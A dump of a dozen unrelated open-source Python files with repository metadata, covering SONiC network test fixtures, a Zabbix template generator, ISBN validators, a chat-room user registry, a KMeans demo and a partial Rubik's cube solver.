| 27.747899 | 79 | 0.650212 | 2,462 | 0.745609 | 0 | 0 | 0 | 0 | 0 | 0 | 1,120 | 0.339188 |
57fc26e3bdf52a1c99cfa051147497ae4c466ad2 | 2,268 | py | Python | tests/stress/conftest.py | lolyu/sonic-mgmt | ed888fd1ce26e7f44fd7f70af00c43ace4882668 | [
"Apache-2.0"
] | 132 | 2016-10-19T12:34:44.000Z | 2022-03-16T09:00:39.000Z | tests/stress/conftest.py | lolyu/sonic-mgmt | ed888fd1ce26e7f44fd7f70af00c43ace4882668 | [
"Apache-2.0"
] | 3,152 | 2016-09-21T23:05:58.000Z | 2022-03-31T23:29:08.000Z | tests/stress/conftest.py | lolyu/sonic-mgmt | ed888fd1ce26e7f44fd7f70af00c43ace4882668 | [
"Apache-2.0"
] | 563 | 2016-09-20T01:00:15.000Z | 2022-03-31T22:43:54.000Z | import logging
import pytest
from tests.common.utilities import wait_until
from utils import get_crm_resources, check_queue_status, sleep_to_wait
CRM_POLLING_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
MAX_WAIT_TIME = 120
logger = logging.getLogger(__name__)
@pytest.fixture(scope='module')
def get_function_conpleteness_level(pytestconfig):
return pytestconfig.getoption("--completeness_level")
@pytest.fixture(scope="module", autouse=True)
def set_polling_interval(duthost):
wait_time = 2
duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
@pytest.fixture(scope='module')
def withdraw_and_announce_existing_routes(duthost, localhost, tbinfo):
ptf_ip = tbinfo["ptf_ip"]
topo_name = tbinfo["topo"]["name"]
logger.info("withdraw existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="withdraw", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "inq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 100)
ipv4_route_used_before = get_crm_resources(duthost, "ipv4_route", "used")
ipv6_route_used_before = get_crm_resources(duthost, "ipv6_route", "used")
logger.info("ipv4 route used {}".format(ipv4_route_used_before))
logger.info("ipv6 route used {}".format(ipv6_route_used_before))
yield ipv4_route_used_before, ipv6_route_used_before
logger.info("announce existing ipv4 and ipv6 routes")
localhost.announce_routes(topo_name=topo_name, ptf_ip=ptf_ip, action="announce", path="../ansible/")
wait_until(MAX_WAIT_TIME, CRM_POLLING_INTERVAL, 0, lambda: check_queue_status(duthost, "outq") == True)
sleep_to_wait(CRM_POLLING_INTERVAL * 5)
logger.info("ipv4 route used {}".format(get_crm_resources(duthost, "ipv4_route", "used")))
logger.info("ipv6 route used {}".format(get_crm_resources(duthost, "ipv6_route", "used")))
| 39.103448 | 107 | 0.761023 | 0 | 0 | 1,777 | 0.78351 | 1,995 | 0.87963 | 0 | 0 | 521 | 0.229718 |
57fc5340cf68c5714f41b1dafe33f998bca42b55 | 7,991 | py | Python | mamonsu/lib/zbx_template.py | dan-aksenov/mamonsu | c4822b48974e870af91910515fd7f11e4b8b41b3 | [
"BSD-3-Clause"
] | null | null | null | mamonsu/lib/zbx_template.py | dan-aksenov/mamonsu | c4822b48974e870af91910515fd7f11e4b8b41b3 | [
"BSD-3-Clause"
] | null | null | null | mamonsu/lib/zbx_template.py | dan-aksenov/mamonsu | c4822b48974e870af91910515fd7f11e4b8b41b3 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from mamonsu.lib.const import Template
class ZbxTemplate(object):
mainTemplate = u"""<?xml version="1.0" encoding="UTF-8"?>
<zabbix_export>
<version>2.0</version>
<groups>
<group>
<name>Templates</name>
</group>
</groups>
<templates>
<template>
<template>{template}</template>
<name>{template}</name>
<groups>
<group>
<name>Templates</name>
</group>
</groups>
<applications>
<application>
<name>{application}</name>
</application>
</applications>
<items>{items}</items>
<discovery_rules>{discovery_rules}</discovery_rules>
<macros>{macros}</macros>
</template>
</templates>
<triggers>{triggers}</triggers>
<graphs>{graphs}</graphs>
</zabbix_export>"""
# https://www.zabbix.com/documentation/2.0/manual/appendix/api/item/definitions
item_defaults = [
('name', None), ('type', 2), ('snmp_community', None),
('multiplier', 0), ('inventory_link', 0),
('key', None), ('snmp_oid', None), ('history', 7),
('trends', 365), ('status', 0), ('delay', 60),
('value_type', Template.VALUE_TYPE.numeric_float),
('allowed_hosts', None), ('valuemap', None),
('units', Template.UNITS.none), ('delta', Template.DELTA.as_is),
('snmpv3_contextname', None), ('snmpv3_securityname', None),
('snmpv3_securitylevel', 0), ('snmpv3_authprotocol', 0),
('snmpv3_authpassphrase', None), ('snmpv3_privprotocol', 0),
('snmpv3_privpassphrase', None), ('formula', 1),
('delay_flex', None), ('params', None),
('ipmi_sensor', None), ('data_type', 0), ('authtype', 0),
('username', None), ('password', None), ('publickey', None),
('privatekey', None), ('port', None), ('description', None)
]
trigger_defaults = [
('expression', None), ('name', None), ('url', None),
('status', 0), ('priority', 3), ('description', None),
('type', 0), ('dependencies', None)
]
trigger_discovery_defaults = [
('expression', None), ('name', None), ('url', None),
('status', 0), ('priority', 3), ('description', None),
('type', 0)
]
graph_values_defaults = [
('name', None), ('width', 900), ('height', 200),
('yaxismin', 0.0000), ('yaxismax', 100.0), ('show_work_period', 1),
('show_triggers', 1), ('type', 0), ('show_legend', 1),
('show_3d', 0), ('percent_left', 0.0), ('percent_right', 0.0),
('ymin_type_1', 0), ('ymax_type_1', 0), ('ymin_item_1', 0),
('ymax_item_1', 0)
]
graph_items_defaults = [
('sortorder', None), ('drawtype', 0),
('color', '00CC00'), ('yaxisside', 0),
('calc_fnc', 2), ('type', Template.GRAPH_TYPE.normal)
]
discovery_defaults = [
('name', None), ('type', 2), ('snmp_community', None),
('snmp_oid', None), ('delay', 60), ('status', 0),
('allowed_hosts', None), ('snmpv3_contextname', None),
('snmpv3_securityname', None), ('snmpv3_securitylevel', 0),
('snmpv3_authprotocol', 0), ('snmpv3_authpassphrase', None),
('snmpv3_privprotocol', 0), ('snmpv3_privpassphrase', None),
('delay_flex', None), ('params', None), ('filter', None),
('ipmi_sensor', None), ('authtype', 0),
('username', None), ('password', None), ('publickey', None),
('privatekey', None), ('port', None), ('lifetime', 7),
('description', None), ('key', None)
]
def __init__(self, name, app):
self.Application = app
self.Template = name
def xml(self, plugins=[]):
# sort plugins!
plugins.sort(key=lambda x: x.__class__.__name__)
# create template
template_data = {}
template_data['template'] = self.Template
template_data['application'] = self.Application
template_data['items'] = self._get_all('items', plugins)
template_data['macros'] = ''
template_data['triggers'] = self._get_all('triggers', plugins)
template_data['graphs'] = self._get_all('graphs', plugins)
template_data['discovery_rules'] = self._get_all(
'discovery_rules', plugins)
return self.mainTemplate.format(**template_data)
def _get_all(self, items='items', plugins=[]):
result = ''
for plugin in plugins:
row = getattr(plugin, items)(self)
if row is None:
continue
result += row
return result
def item(self, args={}, xml_key='item'):
return '<{2}>{0}{1}</{2}>'.format(
self._format_args(self.item_defaults, args),
self._application(),
xml_key)
def trigger(self, args={}, xml_key='trigger', defaults=None):
if defaults is None:
defaults = self.trigger_defaults
try:
expression = args['expression']
except KeyError:
raise LookupError(
'Miss expression in trigger: {0}.'.format(args))
args['expression'] = expression.replace('#TEMPLATE', self.Template)
return '<{1}>{0}</{1}>'.format(
self._format_args(defaults, args),
xml_key)
def graph(self, args={}, xml_key='graph'):
try:
items = args['items']
except KeyError:
raise LookupError(
'Miss item in graph: {0}.'.format(args))
graph_items = ''
for idx, item in enumerate(items):
try:
key = item['key']
except KeyError:
raise LookupError(
'Missed key in graph item: {0}.'.format(item))
if 'sortorder' not in item:
item['sortorder'] = idx
row = '<graph_item>{0}<item><host>{1}'
row += '</host><key>{2}</key></item></graph_item>'
graph_items += row.format(
self._format_args(self.graph_items_defaults, item),
self.Template, key)
result = '<{2}>{0}<graph_items>{1}</graph_items></{2}>'
return result.format(
self._format_args(self.graph_values_defaults, args),
graph_items, xml_key)
def discovery_rule(self, rule={}, items=[], triggers=[], graphs=[]):
result_items = '<item_prototypes>'
for item in items:
result_items += self.item(item, xml_key='item_prototype')
result_items += '</item_prototypes>'
result_triggers = '<trigger_prototypes>'
for trigger in triggers:
result_triggers += self.trigger(
trigger, xml_key='trigger_prototype',
defaults=self.trigger_discovery_defaults)
result_triggers += '</trigger_prototypes>'
result_graphs = '<graph_prototypes>'
for graph in graphs:
result_graphs += self.graph(
graph, xml_key='graph_prototype')
result_graphs += '</graph_prototypes>'
result = '<discovery_rule>{0}{1}{2}{3}</discovery_rule>'
return result.format(
self._format_args(self.discovery_defaults, rule),
result_items, result_triggers, result_graphs)
def _application(self):
result = '<applications><application><name>{0}'
result += '</name></application></applications>'
return result.format(self.Application)
def _format_args(self, defaults, override):
result = ''
for pair in defaults:
key = pair[0]
try:
val = override[key]
except KeyError:
val = pair[1]
if val is None:
row = '<{0}/>'.format(key)
else:
row = '<{0}>{1}</{0}>'.format(key, val)
result += row
return result
| 37.167442 | 79 | 0.541359 | 7,924 | 0.991616 | 0 | 0 | 0 | 0 | 0 | 0 | 2,934 | 0.367163 |
17a84420e19ce12f3b716bc7024aa29937242930 | 1,164 | py | Python | src/rhasspy_desktop_satellite/exceptions.py | mcorino/rhasspy-desktop-satellite | aeaa820a0acdcc2e70db1f74157a0c7d3ac5d4bd | [
"MIT"
] | null | null | null | src/rhasspy_desktop_satellite/exceptions.py | mcorino/rhasspy-desktop-satellite | aeaa820a0acdcc2e70db1f74157a0c7d3ac5d4bd | [
"MIT"
] | null | null | null | src/rhasspy_desktop_satellite/exceptions.py | mcorino/rhasspy-desktop-satellite | aeaa820a0acdcc2e70db1f74157a0c7d3ac5d4bd | [
"MIT"
] | null | null | null | """This module contains exceptions defined for Rhasspy Desktop Satellite."""
class RDSatelliteServerError(Exception):
"""Base class for exceptions raised by Rhasspy Desktop Satellite code.
By catching this exception type, you catch all exceptions that are
defined by the Hermes Audio Server code."""
class ConfigurationFileNotFoundError(RDSatelliteServerError):
"""Raised when the configuration file is not found."""
def __init__(self, filename):
"""Initialize the exception with a string representing the filename."""
self.filename = filename
class NoDefaultAudioDeviceError(RDSatelliteServerError):
"""Raised when there's no default audio device available."""
def __init__(self, inout):
"""Initialize the exception with a string representing input or output.
"""
self.inout = inout
class UnsupportedPlatformError(RDSatelliteServerError):
"""Raised when the platform Rhasspy Desktop Satellite is running on is not
supported."""
def __init__(self, platform):
"""Initialize the exception with a string representing the platform."""
self.platform = platform
| 33.257143 | 79 | 0.726804 | 1,075 | 0.92354 | 0 | 0 | 0 | 0 | 0 | 0 | 697 | 0.598797 |
17a9215dd525fc26ed3417c0d32824c0c0045586 | 1,084 | py | Python | KMeans.py | trinity652/Skin-Cancer-Classification | 257be485b84077440be77cf14b5e40d9a6765f94 | [
"MIT"
] | 16 | 2018-01-23T12:20:04.000Z | 2021-11-05T10:01:20.000Z | KMeans.py | trinity652/Skin-Cancer-Classification | 257be485b84077440be77cf14b5e40d9a6765f94 | [
"MIT"
] | null | null | null | KMeans.py | trinity652/Skin-Cancer-Classification | 257be485b84077440be77cf14b5e40d9a6765f94 | [
"MIT"
] | 1 | 2020-11-29T09:29:27.000Z | 2020-11-29T09:29:27.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 30 17:48:49 2017
@author: abhilasha
Using SKLearns API for performing Kmeans clustering.
Using sklearn.datasets.make_blobs for generating randomized gaussians
for clustering.
"""
import numpy as np
from matplotlib import pyplot as plt
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
# create a dataset sample space that will be used
# to test KMeans. Use function : make_blobs
#
n_samples = 1000
n_features = 5;
n_clusters = 3;
# aint this sweet
X, y = make_blobs(n_samples, n_features)
# X => array of shape [nsamples,nfeatures] ;;; y => array of shape[nsamples]
# X : generated samples, y : integer labels for cluster membership of each sample
#
#
# performing KMeans clustering
ret = KMeans(n_clusters = n_clusters).fit_predict(X)
print (ret)
__, ax = plt.subplots(2)
ax[0].scatter(X[:,0], X[:,1])
ax[0].set_title("Initial Scatter Distribution")
ax[1].scatter(X[:,0], X[:,1], c=ret)
ax[1].set_title("Colored Partition denoting Clusters")
# plt.scatter
plt.show()
| 22.583333 | 81 | 0.725092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 632 | 0.583026 |
17a967eb21d3033ca6492eedc8fc39e1742110e2 | 1,388 | py | Python | test/unit/test_classical_explainer.py | tomdyer10/interpret-text | 0c56fb645de882e31f0623afdb949d3b8f9c6aad | [
"MIT"
] | 1 | 2020-08-28T05:13:22.000Z | 2020-08-28T05:13:22.000Z | test/unit/test_classical_explainer.py | nehalecky/interpret-text | 62a5e7406bf5c7d2df69648a278082d602e88dd6 | [
"MIT"
] | null | null | null | test/unit/test_classical_explainer.py | nehalecky/interpret-text | 62a5e7406bf5c7d2df69648a278082d602e88dd6 | [
"MIT"
] | null | null | null | # ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# Tests for classical explainer
from interpret_text.experimental.classical import ClassicalTextExplainer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from utils_test import get_mnli_test_dataset
DOCUMENT = "rare bird has more than enough charm to make it memorable."
class TestClassicalExplainer(object):
def test_working(self):
assert True
def test_explain_model_local(self):
"""
Test for explain_local of classical explainer
:return:
"""
train_df = get_mnli_test_dataset('train')
X_str = train_df['sentence1']
ylabels = train_df['genre']
X_train, X_test, y_train, y_test = train_test_split(X_str, ylabels, train_size=0.8, test_size=0.2)
label_encoder = LabelEncoder()
y_train = label_encoder.fit_transform(y_train)
explainer = ClassicalTextExplainer()
classifier, best_params = explainer.fit(X_train, y_train)
explainer.preprocessor.labelEncoder = label_encoder
local_explanantion = explainer.explain_local(DOCUMENT)
assert len(local_explanantion.local_importance_values) == len(local_explanantion.features)
| 38.555556 | 106 | 0.672911 | 881 | 0.634726 | 0 | 0 | 0 | 0 | 0 | 0 | 379 | 0.273055 |
17a96a19e673a02ce4216b998f3cb8431e172a1f | 1,378 | py | Python | create_python_app/main.py | xuchaoqian/create-python-app | 70745432b972b96a3faf95a378d54d922b77f2be | [
"MIT"
] | null | null | null | create_python_app/main.py | xuchaoqian/create-python-app | 70745432b972b96a3faf95a378d54d922b77f2be | [
"MIT"
] | null | null | null | create_python_app/main.py | xuchaoqian/create-python-app | 70745432b972b96a3faf95a378d54d922b77f2be | [
"MIT"
] | null | null | null | import argparse
from create_python_app.path_utils import *
from create_python_app.create_gitignore_file import create_gitignore_file
from create_python_app.create_license_file import create_license_file
from create_python_app.create_makefile_file import create_makefile_file
from create_python_app.create_readme_file import create_readme_file
from create_python_app.create_requirements_file import create_requirements_file
from create_python_app.create_setup_file import create_setup_file
from create_python_app.create_root_package import create_root_package
from create_python_app.create_config_files import create_config_files
from create_python_app.create_config_module import create_config_module
def _parse():
parser = argparse.ArgumentParser()
parser.add_argument("--name", required=True, type=str)
args = parser.parse_args()
return args.name
def main():
app_name = _parse()
base_dir = create_dir(os.getcwd(), app_name)
create_gitignore_file(base_dir)
create_license_file(base_dir)
create_makefile_file(base_dir, app_name=app_name)
create_readme_file(base_dir, app_name=app_name)
create_requirements_file(base_dir)
create_setup_file(base_dir)
create_root_package(base_dir, app_name=app_name)
create_config_files(base_dir)
create_config_module(base_dir, app_name=app_name)
if __name__ == '__main__':
main() | 41.757576 | 79 | 0.834543 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.013062 |
17ab540dcdbf37fd31ad32aaf93a82fb1d9028a9 | 1,113 | py | Python | Lexical Analyzer.py | amitnandi04/Compiler_Construction | d9e18735b74fdacab76ed892a9b8fb3ae50c49ce | [
"Unlicense"
] | null | null | null | Lexical Analyzer.py | amitnandi04/Compiler_Construction | d9e18735b74fdacab76ed892a9b8fb3ae50c49ce | [
"Unlicense"
] | null | null | null | Lexical Analyzer.py | amitnandi04/Compiler_Construction | d9e18735b74fdacab76ed892a9b8fb3ae50c49ce | [
"Unlicense"
] | null | null | null | # Lexical Analyzer
import re # for performing regex expressions
tokens = [] # for string tokens
source_code = 'int result = 100;'.split() # turning source code into list of words
# Loop through each source code word
for word in source_code:
# This will check if a token has datatype decleration
if word in ['str', 'int', 'bool']:
tokens.append(['DATATYPE', word])
# This will look for an identifier which would be just a word
elif re.match("[a-z]", word) or re.match("[A-Z]", word):
tokens.append(['IDENTIFIER', word])
# This will look for an operator
elif word in '*-/+%=':
tokens.append(['OPERATOR', word])
# This will look for integer items and cast them as a number
elif re.match(".[0-9]", word):
if word[len(word) - 1] == ';':
tokens.append(["INTEGER", word[:-1]])
tokens.append(['END_STATEMENT', ';'])
else:
tokens.append(["INTEGER", word])
print(tokens) # Outputs the token array | 35.903226 | 83 | 0.554358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 523 | 0.469901 |
17ac5c168ff8f7e5043d020dc537567d52acfba3 | 5,114 | py | Python | user.py | genba2/pinybotbeta-enhanced | 564ae7c363ee00ad2ae0e05d74e08e58de3d1d2f | [
"MIT"
] | null | null | null | user.py | genba2/pinybotbeta-enhanced | 564ae7c363ee00ad2ae0e05d74e08e58de3d1d2f | [
"MIT"
] | null | null | null | user.py | genba2/pinybotbeta-enhanced | 564ae7c363ee00ad2ae0e05d74e08e58de3d1d2f | [
"MIT"
] | null | null | null | import time
class User:
"""
A class representing a users information.
NOTE: Defaults are attributes that pinylib expects
"""
def __init__(self, **kwargs):
# Default's.
self.lf = kwargs.get('lf')
self.account = kwargs.get('account', '')
self.is_owner = kwargs.get('own', False)
self.gp = kwargs.get('gp', 0)
self.alevel = kwargs.get('alevel', '')
self.bf = kwargs.get('bf', False)
self.nick = kwargs.get('nick')
self.btype = kwargs.get('btype', '')
self.id = kwargs.get('id', -1)
self.stype = kwargs.get('stype', 0)
self.is_mod = kwargs.get('mod', False)
self.join_time = time.time()
self.tinychat_id = None
self.last_login = None
self.user_level = 0
# Extras.
self.last_msg = None
self.screened = False
class Users:
"""
This class represents the users in the room.
Each user name is a dict key where the value of the key is represented by the User class.
It contains methods to do various user based operations with.
"""
def __init__(self):
# Create a dictionary to store each user key value in.
self._users = dict()
@property
def all(self):
"""
All the users in the room.
:return: dict key value (User)
"""
return self._users
@property
def mods(self):
"""
All the moderators in the room.
:return: list all of the moderators objects (User) in the room.
"""
_mods = []
for user in self.all:
if self.all[user].is_mod:
_mods.append(self.all[user])
return _mods
@property
def signed_in(self):
"""
All users in the room using an account.
:return: list all the signed in users objects (user) in the room.
"""
_signed_ins = []
for user in self.all:
if self.all[user].account:
_signed_ins.append(self.all[user])
return _signed_ins
@property
def nli(self):
nlis = []
for user in self.all:
if not self.all[user].account:
nlis.append(self.all[user])
return nlis
@property
def lurkers(self):
"""
All the lurkers in the room.
:return: list of all the lurker objects (User) in the room.
"""
_lurkers = []
for user in self.all:
if self.all[user].lf:
_lurkers.append(self.all[user])
return _lurkers
@property
def norms(self):
"""
All the normal users in the room.
e.g users that are not moderators or lurkers.
:return: list of all the normal users objects (User) in the room.
"""
_regs = []
for user in self.all:
if not self.all[user].is_mod and not self.all[user].lf:
_regs.append(self.all[user])
return _regs
def clear(self):
""" Delete all the users. """
self._users.clear()
def add(self, user_info):
"""
Add a user to the users dict.
:param user_info dict, tinychat user info.
:return user info object (User)
"""
if user_info['nick'] not in self.all:
self._users[user_info['nick']] = User(**user_info)
return self.all[user_info['nick']]
def change(self, old_nick, new_nick, user_info):
"""
Change a user nickname.
:param old_nick: str the user's old nickname.
:param new_nick: str the user's new nickname.
:param user_info: object, the user's user info (User)
:return: True if changed, else False.
"""
if self.delete(old_nick):
if new_nick not in self.all:
self._users[new_nick] = user_info
return True
return False
return False
def delete(self, user_name):
"""
Delete a user from the Users class.
:param user_name: str the user to delete.
:return: True if deleted, else False.
"""
if user_name in self.all:
del self._users[user_name]
return True
return False
def search(self, user_name):
"""
Search the Users class by nick name for a user.
:param user_name: str the user to find.
:return: if user name is found, object (User) else None
"""
if user_name in self.all:
return self.all[user_name]
return None
# TODO: Issue with search by id, if the user is not found the in the dictionary on the first pass through the
# loop then it will by default return None.
def search_by_id(self, user_id):
"""
Search for a user by id.
:param user_id: str the users ID
:return if user id is found, object (User) else None
"""
for user in self.all:
#print(user)
if str(self.all[user].id) == user_id:
return self.all[user]
return None
| 30.082353 | 113 | 0.553969 | 5,096 | 0.99648 | 0 | 0 | 1,732 | 0.338678 | 0 | 0 | 2,247 | 0.439382 |
17afc776c10c0b9ba372d9ed2ac769c202c71e90 | 2,696 | py | Python | my_python_module/exceptions.py | a358003542/wanze_python_project | db52515af80319000e9a47a7b02f3ccd2cf46afd | [
"MIT"
] | 1 | 2020-10-30T08:54:22.000Z | 2020-10-30T08:54:22.000Z | my_python_module/exceptions.py | a358003542/wanze_python_project | db52515af80319000e9a47a7b02f3ccd2cf46afd | [
"MIT"
] | null | null | null | my_python_module/exceptions.py | a358003542/wanze_python_project | db52515af80319000e9a47a7b02f3ccd2cf46afd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
python系统内的异常
+-- Exception
+-- StopIteration
+-- StopAsyncIteration
+-- ArithmeticError
| +-- FloatingPointError
| +-- OverflowError
| +-- ZeroDivisionError
+-- AssertionError
+-- AttributeError
+-- BufferError
+-- EOFError
+-- ImportError
| +-- ModuleNotFoundError
+-- LookupError
| +-- IndexError
| +-- KeyError
+-- MemoryError
+-- NameError
| +-- UnboundLocalError
+-- OSError
| +-- BlockingIOError
| +-- ChildProcessError
| +-- ConnectionError
| | +-- BrokenPipeError
| | +-- ConnectionAbortedError
| | +-- ConnectionRefusedError
| | +-- ConnectionResetError
| +-- FileExistsError
| +-- FileNotFoundError
| +-- InterruptedError
| +-- IsADirectoryError
| +-- NotADirectoryError
| +-- PermissionError
| +-- ProcessLookupError
| +-- TimeoutError
+-- ReferenceError
+-- RuntimeError
| +-- NotImplementedError
| +-- RecursionError
+-- SyntaxError
| +-- IndentationError
| +-- TabError
+-- SystemError
+-- TypeError
+-- ValueError
| +-- UnicodeError
| +-- UnicodeDecodeError
| +-- UnicodeEncodeError
| +-- UnicodeTranslateError
+-- Warning
+-- DeprecationWarning
+-- PendingDeprecationWarning
+-- RuntimeWarning
+-- SyntaxWarning
+-- UserWarning
+-- FutureWarning
+-- ImportWarning
+-- UnicodeWarning
+-- BytesWarning
+-- ResourceWarning
"""
class ConfigFileNotFoundError(FileNotFoundError):
"""
The config file not found.
"""
class RequireArgumentError(Exception):
"""
Require some argument
"""
class FatalError():
"""Fatal Error, the program need shutdown imediately"""
class NotIntegerError(ValueError):
"""Need input is a integer"""
class NotFloatError(ValueError):
"""Need input is a float"""
class OutOfRangeError(ValueError):
"""The input required a range"""
class OutOfChoiceError(ValueError):
"""The parameter is out of given choice"""
class NotSupportedWarning(UserWarning):
"""This feature is not supported, program will ignore it."""
class UnDefinedError():
"""UndefinedError, lately we will talk about it. """
class GuessFailed(Warning):
"""
Your function do some guess operation but cause a failed, this is a warning.
"""
| 23.858407 | 80 | 0.554154 | 848 | 0.313146 | 0 | 0 | 0 | 0 | 0 | 0 | 2,294 | 0.84712 |
17b1221ef72aae7747a03fca3ca613968d0d4959 | 3,386 | py | Python | catbridge_tools/isbn_tools.py | victoriamorris/CatBridge | a91164f85ffcb93eb17c786d4a178a559242f7c9 | [
"MIT"
] | null | null | null | catbridge_tools/isbn_tools.py | victoriamorris/CatBridge | a91164f85ffcb93eb17c786d4a178a559242f7c9 | [
"MIT"
] | null | null | null | catbridge_tools/isbn_tools.py | victoriamorris/CatBridge | a91164f85ffcb93eb17c786d4a178a559242f7c9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ====================
# Set-up
# ====================
# Import required modules
import re
__author__ = 'Victoria Morris'
__license__ = 'MIT License'
__version__ = '1.0.0'
__status__ = '4 - Beta Development'
# ====================
# Regular expressions
# ====================
RE_ISBN10 = re.compile(r'\b(?=(?:[0-9]+[\- ]?){10})[0-9]{9}[0-9X]\b|'
r'\b(?=(?:[0-9]+[\- ]?){13})[0-9]{1,5}[\- ][0-9]+[\- ][0-9]+[\- ][0-9X]\b')
RE_ISBN13 = re.compile(r'\b97[89][0-9]{10}\b|'
r'\b(?=(?:[0-9]+[\- ]){4})97[89][\- 0-9]{13}[0-9]\b')
# ====================
# Classes
# ====================
class Isbn(object):
def __init__(self, content):
self.isbn = re.sub(r'X(?!$)', '', re.sub(r'[^0-9X]', '', content.upper()))
def __str__(self):
return self.isbn
def trim(self):
if len(self.isbn) > 13:
self.isbn = self.isbn[:13]
if 10 < len(self.isbn) < 13:
self.isbn = self.isbn[:10]
def convert(self):
if is_isbn_10(self.isbn):
self.isbn = isbn_convert(self.isbn)
# ====================
# Functions
# ====================
def isbn_10_check_digit(nine_digits):
"""Function to get the check digit for a 10-digit ISBN"""
if len(nine_digits) != 9:
return None
try:
int(nine_digits)
except Exception:
return None
remainder = int(sum((i + 2) * int(x) for i, x in enumerate(reversed(nine_digits))) % 11)
if remainder == 0:
tenth_digit = 0
else:
tenth_digit = 11 - remainder
if tenth_digit == 10:
tenth_digit = 'X'
return str(tenth_digit)
def isbn_13_check_digit(twelve_digits):
"""Function to get the check digit for a 13-digit ISBN"""
if len(twelve_digits) != 12:
return None
try:
int(twelve_digits)
except Exception:
return None
thirteenth_digit = 10 - int(sum((i % 2 * 2 + 1) * int(x) for i, x in enumerate(twelve_digits)) % 10)
if thirteenth_digit == 10:
thirteenth_digit = '0'
return str(thirteenth_digit)
def isbn_10_check_structure(isbn10):
"""Function to check the structure of a 10-digit ISBN"""
return True if re.match(RE_ISBN10, isbn10) else False
def isbn_13_check_structure(isbn13):
"""Function to check the structure of a 13-digit ISBN"""
return True if re.match(RE_ISBN13, isbn13) else False
def is_isbn_10(isbn10):
"""Function to validate a 10-digit ISBN"""
isbn10 = re.sub(r'[^0-9X]', '', isbn10.replace('x', 'X'))
if len(isbn10) != 10:
return False
return False if isbn_10_check_digit(isbn10[:-1]) != isbn10[-1] else True
def is_isbn_13(isbn13):
"""Function to validate a 13-digit ISBN"""
isbn13 = re.sub(r'[^0-9X]', '', isbn13.replace('x', 'X'))
if len(isbn13) != 13:
return False
if isbn13[0:3] not in ('978', '979'):
return False
return False if isbn_13_check_digit(isbn13[:-1]) != isbn13[-1] else True
def isbn_convert(isbn10):
"""Function to convert a 10-digit ISBN to a 13-digit ISBN"""
if not is_isbn_10(isbn10):
return None
return '978' + isbn10[:-1] + isbn_13_check_digit('978' + isbn10[:-1])
| 27.754098 | 105 | 0.533077 | 475 | 0.140284 | 0 | 0 | 0 | 0 | 0 | 0 | 1,036 | 0.305966 |
17b21b596279e3ab02d31a65bd2b5613da788991 | 1,334 | py | Python | tests/test_shows_tab.py | andrsd/podcastista | c05a1de09d2820899aebe592d3d4b01d64d1e5fe | [
"MIT"
] | null | null | null | tests/test_shows_tab.py | andrsd/podcastista | c05a1de09d2820899aebe592d3d4b01d64d1e5fe | [
"MIT"
] | 17 | 2021-09-22T12:21:46.000Z | 2022-02-26T12:26:40.000Z | tests/test_shows_tab.py | andrsd/podcastista | c05a1de09d2820899aebe592d3d4b01d64d1e5fe | [
"MIT"
] | null | null | null | import platform
import pytest
from unittest.mock import MagicMock
from PyQt5 import QtWidgets
if platform.system() == "Darwin":
@pytest.fixture
def widget(qtbot, main_window):
from podcastista.ShowsTab import ShowsTab
widget = ShowsTab(main_window)
qtbot.addWidget(widget)
yield widget
def test_init(widget):
assert widget._shows == []
def test_show(widget):
sh = [
1, 2, 3
]
widget._shows = sh
assert widget.shows == sh
def test_clear(widget):
widget._layout.addWidget(QtWidgets.QWidget())
widget.clear()
assert widget._layout.count() == 0
def test_fill(widget):
show = {
'id': '1234',
'name': 'show',
'images': [
{'url': 'url-0'},
{'url': 'url-1'}
],
'publisher': 'publisher',
}
spotify = MagicMock()
spotify.current_user_saved_shows.return_value = {
'items': [
{'show': show},
{'show': show}
]
}
widget._main_window._spotify = spotify
widget._layout = MagicMock()
widget._layout.count.return_value = 2
widget.fill()
assert widget._layout.addWidget.call_count == 2
| 25.169811 | 57 | 0.530735 | 0 | 0 | 173 | 0.129685 | 193 | 0.144678 | 0 | 0 | 103 | 0.077211 |
17b2749503c2c092f3b9104e3fd3d23979721585 | 1,999 | py | Python | Solver.py | ANewDeviloper/Rubiks-Simulator | 31d06e4b5415ccf754ec91bcdd5c755e2e355d86 | [
"MIT"
] | null | null | null | Solver.py | ANewDeviloper/Rubiks-Simulator | 31d06e4b5415ccf754ec91bcdd5c755e2e355d86 | [
"MIT"
] | null | null | null | Solver.py | ANewDeviloper/Rubiks-Simulator | 31d06e4b5415ccf754ec91bcdd5c755e2e355d86 | [
"MIT"
] | null | null | null | # -*- coding: utf8 -*-
import CubeModel
methodIDs = {1 : "TLPU", 2 : "TLPD", 3 : "TVMPU", 4 : "TVMPD", 5 : "TRPU", 6 : "TRPD",
7 : "TFPR", 8 : "TFPL", 9 : "TOMPR", 10 : "TOMPL", 11 : "TBPR", 12 : "TBPL",
13 : "TUPR", 14 : "TUPL", 15 : "THMPR", 16 : "THMPL", 17 : "TDPR", 18 : "TDPL", }
def compareCubes(cube1, cube2):
ret = True
for sideKey in cube1.Content:
for pieceKey in cube1.Content.get(sideKey).Content:
if cube1.Content.get(sideKey).Content.get(pieceKey) == cube2.Content.get(sideKey).Content.get(pieceKey):
pass
else:
ret = False
return ret
def solveByTrying(cubeYouHave, cubeToGet):
counter = 0
methodArray = []
solved = False
